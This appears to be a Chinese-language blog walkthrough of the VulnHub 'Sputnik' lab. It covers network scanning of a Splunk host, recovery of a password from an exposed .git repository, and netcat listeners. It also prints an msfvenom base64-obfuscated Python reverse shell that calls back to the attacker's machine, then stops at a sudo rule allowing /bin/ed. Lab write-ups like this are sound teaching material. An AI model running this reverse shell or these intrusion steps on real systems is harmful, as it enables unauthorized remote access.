Sputnik
识别目标主机IP地址
──(kali㉿kali)-[~/Vulnhub/Sputnik]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.90.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:d0:94:27 1 60 PCS Systemtechnik GmbH
192.168.56.135 08:00:27:d8:0b:51 1 60 PCS Systemtechnik GmbH
利用netdiscover工具识别目标主机的IP地址为192.168.56.135
NMAP 扫描
─$ sudo nmap -sS -sV -sC -p- 192.168.56.135 -oN nmap_full_scan
sudo: unable to resolve host kali: Temporary failure in name resolution
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-27 02:32 EDT
Nmap scan report for bogon (192.168.56.135)
Host is up (0.000069s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
8089/tcp open ssl/http Splunkd httpd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2019-03-29T11:03:21
|_Not valid after: 2022-03-28T11:03:21
|_http-server-header: Splunkd
|_http-title: splunkd
| http-robots.txt: 1 disallowed entry
|_/
55555/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Flappy Bird Game
| http-git:
| 192.168.56.135:55555/.git/
| Git repository found!
|_ Repository description: Unnamed repository; edit this file 'description' to name the...
61337/tcp open http Splunkd httpd
|_http-server-header: Splunkd
| http-robots.txt: 1 disallowed entry
|_/
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was http://bogon:61337/en-US/account/login?return_to=%2Fen-US%2F
MAC Address: 08:00:27:D8:0B:51 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.68 seconds
从NMAP扫描结果来看,目标主机运行服务与Splunk有关,一款日志分析和数据分析系统。
信息收集
对所发现的端口依次进行分析,先访问一下8089端口,由于nmap扫描时就知道目标在该端口有SSL层
─(kali㉿kali)-[~/Vulnhub/Sputnik]
└─$ curl --help all | grep secure
--doh-insecure Allow insecure DoH server connections
-k, --insecure Allow insecure server connections
--proxy-insecure Do HTTPS proxy connections without verifying the proxy
┌──(kali㉿kali)-[~/Vulnhub/Sputnik]
└─$ curl https://192.168.56.135:8089/ -k
<?xml version="1.0" encoding="UTF-8"?>
<!--This is to override browser formatting; see server.conf[httpServer] to disable. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .-->
<?xml-stylesheet type="text/xml" href="/static/atom.xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xmlns:s="http://dev.splunk.com/ns/rest">
<title>splunkd</title>
<id>https://192.168.56.135:8089/</id>
<updated>2022-10-27T15:16:51+00:00</updated>
<generator build="962d9a8e1586" version="7.2.5.1"/>
<author>
<name>Splunk</name>
</author>
<entry>
<title>rpc</title>
<id>https://192.168.56.135:8089/rpc</id>
<updated>1970-01-01T00:00:00+00:00</updated>
<link href="/rpc" rel="alternate"/>
</entry>
<entry>
<title>services</title>
<id>https://192.168.56.135:8089/services</id>
<updated>1970-01-01T00:00:00+00:00</updated>
<link href="/services" rel="alternate"/>
</entry>
<entry>
<title>servicesNS</title>
<id>https://192.168.56.135:8089/servicesNS</id>
<updated>1970-01-01T00:00:00+00:00</updated>
<link href="/servicesNS" rel="alternate"/>
</entry>
<entry>
<title>static</title>
<id>https://192.168.56.135:8089/static</id>
<updated>1970-01-01T00:00:00+00:00</updated>
<link href="/static" rel="alternate"/>
</entry>
</feed>
从上述返回结果看有3个链接,依次访问这些链接
─(kali㉿kali)-[~/Vulnhub/Sputnik]
└─$ curl https://192.168.56.135:8089/rpc -k
Invalid request
┌──(kali㉿kali)-[~/Vulnhub/Sputnik]
└─$ curl https://192.168.56.135:8089/services -k
<?xml version="1.0" encoding="UTF-8"?>
<response>
<messages>
<msg type="ERROR">Unauthorized</msg>
</messages>
</response>
┌──(kali㉿kali)-[~/Vulnhub/Sputnik]
└─$ curl https://192.168.56.135:8089/servicesNS -k
<?xml version="1.0" encoding="UTF-8"?>
<response>
<messages>
<msg type="ERROR">Unauthorized</msg>
</messages>
</response>
┌──(kali㉿kali)-[~/Vulnhub/Sputnik]
└─$ curl https://192.168.56.135:8089/static -k
<!doctype html><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
接下来看一下目标主机上55555端口
根据nmap扫描结果55555端口下游个/.git目录
──(kali㉿kali)-[~/Vulnhub/Sputnik]
└─$ gobuster dir -u http://192.168.56.135:55555 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -z
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.135:55555
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/10/27 02:39:30 Starting gobuster in directory enumeration mode
===============================================================
/server-status (Status: 403) [Size: 305]
===============================================================
2022/10/27 02:39:56 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Sputnik]
└─$ dirb http://192.168.56.135:55555
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu Oct 27 02:40:27 2022
URL_BASE: http://192.168.56.135:55555/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.135:55555/ ----
+ http://192.168.56.135:55555/.git/HEAD (CODE:200|SIZE:23)
+ http://192.168.56.135:55555/index.html (CODE:200|SIZE:7834)
+ http://192.168.56.135:55555/server-status (CODE:403|SIZE:305)
-----------------
END_TIME: Thu Oct 27 02:40:29 2022
DOWNLOADED: 4612 - FOUND: 3
目录扫描工具也证实了NMAP扫描结果
─(kali㉿kali)-[~/Vulnhub/Sputnik]
└─$ curl http://192.168.56.135:55555/.git/HEAD
ref: refs/heads/master
┌──(kali㉿kali)-[~/Vulnhub/Sputnik]
└─$ curl http://192.168.56.135:55555/.git/logs/HEAD
0000000000000000000000000000000000000000 21b4eb398bdae0799afbbb528468b5c6f580b975 root <root@sputnik.(none)> 1553864873 +0000 clone: from https://github.com/ameerpornillos/flappy.git
发现了一个clone交流
─(kali㉿kali)-[~/Vulnhub/Sputnik/flappy]
└─$ git log -p
diff --git a/secret b/secret
new file mode 100644
index 0000000..f438519
--- /dev/null
+++ b/secret
@@ -0,0 +1 @@
+sputnik:ameer_says_thank_you_and_good_job
发现了sputnik的密码
利用用户名和密码登录
─(kali㉿kali)-[~/Vulnhub/Sputnik/flappy]
└─$ ls
index.html README.md sheet.png splunk_shells-1.2.tar.gz sprite.js
─(kali㉿kali)-[~/Vulnhub/Sputnik/flappy]
└─$ sudo nc -nlvp 5555
sudo: unable to resolve host kali: Temporary failure in name resolution
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.135] 47694
id
uid=1001(splunk) gid=1001(splunk) groups=1001(splunk)
which python
/opt/splunk/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
发现目标执行上述命令后夯住了,不能进入交互式shell
用msfvenom创建另一个shell
─(kali㉿kali)-[~/Vulnhub/Sputnik]
└─$ msfvenom -p cmd/unix/reverse_python lhost=192.168.56.101 lport=6666 R
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 605 bytes
python -c "exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCAgICwgICAgICAgc3VicHJvY2VzcyAgICwgICAgICAgb3MgICAgOyAgICAgIGhvc3Q9IjE5Mi4xNjguNTYuMTAxIiAgICA7ICAgICAgcG9ydD02NjY2ICAgIDsgICAgICBzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQgICAsICAgICAgIHNvY2tldC5TT0NLX1NUUkVBTSkgICAgOyAgICAgIHMuY29ubmVjdCgoaG9zdCAgICwgICAgICAgcG9ydCkpICAgIDsgICAgICBvcy5kdXAyKHMuZmlsZW5vKCkgICAsICAgICAgIDApICAgIDsgICAgICBvcy5kdXAyKHMuZmlsZW5vKCkgICAsICAgICAgIDEpICAgIDsgICAgICBvcy5kdXAyKHMuZmlsZW5vKCkgICAsICAgICAgIDIpICAgIDsgICAgICBwPXN1YnByb2Nlc3MuY2FsbCgiL2Jpbi9iYXNoIik=')[0]))"
┌──(kali㉿kali)-[~/Vulnhub/Sputnik/flappy]
└─$ sudo nc -nlvp 5555
sudo: unable to resolve host kali: Temporary failure in name resolution
listening on [any] 5555 ...
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.135] 48408
id
uid=1001(splunk) gid=1001(splunk) groups=1001(splunk)
which python
/opt/splunk/bin/python
python -c "exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCAgICwgICAgICAgc3VicHJvY2VzcyAgICwgICAgICAgb3MgICAgOyAgICAgIGhvc3Q9IjE5Mi4xNjguNTYuMTAxIiAgICA7ICAgICAgcG9ydD02NjY2ICAgIDsgICAgICBzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQgICAsICAgICAgIHNvY2tldC5TT0NLX1NUUkVBTSkgICAgOyAgICAgIHMuY29ubmVjdCgoaG9zdCAgICwgICAgICAgcG9ydCkpICAgIDsgICAgICBvcy5kdXAyKHMuZmlsZW5vKCkgICAsICAgICAgIDApICAgIDsgICAgICBvcy5kdXAyKHMuZmlsZW5vKCkgICAsICAgICAgIDEpICAgIDsgICAgICBvcy5kdXAyKHMuZmlsZW5vKCkgICAsICAgICAgIDIpICAgIDsgICAgICBwPXN1YnByb2Nlc3MuY2FsbCgiL2Jpbi9iYXNoIik=')[0]))"
──(kali㉿kali)-[~/Vulnhub/Sputnik]
└─$ sudo nc -nlvp 6666
sudo: unable to resolve host kali: Temporary failure in name resolution
[sudo] password for kali:
listening on [any] 6666 ...
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.135] 53886
id
uid=1001(splunk) gid=1001(splunk) groups=1001(splunk)
which python
/opt/splunk/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
splunk@sputnik:/$ sudo -l
sudo -l
[sudo] password for splunk: ameer_says_thank_you_and_good_job
Matching Defaults entries for splunk on sputnik:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User splunk may run the following commands on sputnik:
(root) /bin/ed
此时可以利用Python spawn一个交互式shell了
然后看一下sudo -l
发现/ed可以利用
标签:00,http,kali,192.168,Sputnik,Vulnhub,56.135,靶机
From: https://www.cnblogs.com/jason-huawen/p/16832485.html